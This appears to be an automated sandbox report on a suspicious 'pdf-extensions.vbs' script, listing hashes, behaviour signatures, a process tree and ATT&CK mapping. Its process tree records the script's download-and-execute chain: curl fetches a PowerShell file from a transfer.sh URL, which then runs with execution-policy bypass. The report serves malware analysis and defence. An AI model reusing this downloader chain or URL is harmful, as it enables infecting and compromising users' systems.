Overview

overview

10

Static

static

1

$RECYCLE.B...GOK.js

windows7-x64

10

$RECYCLE.B...GOK.js

windows10-2004-x64

10

$RECYCLE.B...KV.scr

windows7-x64

1

$RECYCLE.B...KV.scr

windows10-2004-x64

1

$RECYCLE.B...XJ.exe

windows7-x64

3

$RECYCLE.B...XJ.exe

windows10-2004-x64

3

$RECYCLE.B...6RL.js

windows7-x64

10

$RECYCLE.B...6RL.js

windows10-2004-x64

10

$RECYCLE.B...IB.exe

windows7-x64

1

$RECYCLE.B...IB.exe

windows10-2004-x64

1

$RECYCLE.B...S1.bat

windows7-x64

7

$RECYCLE.B...S1.bat

windows10-2004-x64

7

pdf-extensions.vbs

windows7-x64

3

pdf-extensions.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    251s
  • max time network
    397s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    31-03-2023 16:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pdf-extensions.vbs

  • Size

    111KB

  • MD5

    3fa09c9c6deff87d8c7d42b352ce52b6

  • SHA1

    c69283b1d90cd7fbec45521149292956ca4c6a1f

  • SHA256

    4b18539613e1c78a58734ef5e60fe4793ca83384930a4172dbe7a008b14fec31

  • SHA512

    90696b88151fe173fd2bf64c049b6f7f30493d4daf033f36b9f67f8c94f8b75047df1e7129a119d93bfeafb35007a6341bc745dfac78f817f070c2f9ca44f40e

  • SSDEEP

    12:O+h3awpefBNRxkj5H6NPnqkc+h3awpeZ9nF6NPnJo:O+9xYZNRxo5wqh+9xYZlym

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pdf-extensions.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:548
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        3⤵
          PID:892
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1004
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1776

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1776-58-0x000000001B100000-0x000000001B3E2000-memory.dmp
      Filesize

      2.9MB

      Download
    • memory/1776-59-0x0000000002410000-0x0000000002418000-memory.dmp
      Filesize

      32KB

      Download
    • memory/1776-60-0x0000000002390000-0x0000000002410000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1776-61-0x0000000002390000-0x0000000002410000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1776-62-0x000000000239B000-0x00000000023D2000-memory.dmp
      Filesize

      220KB

      Download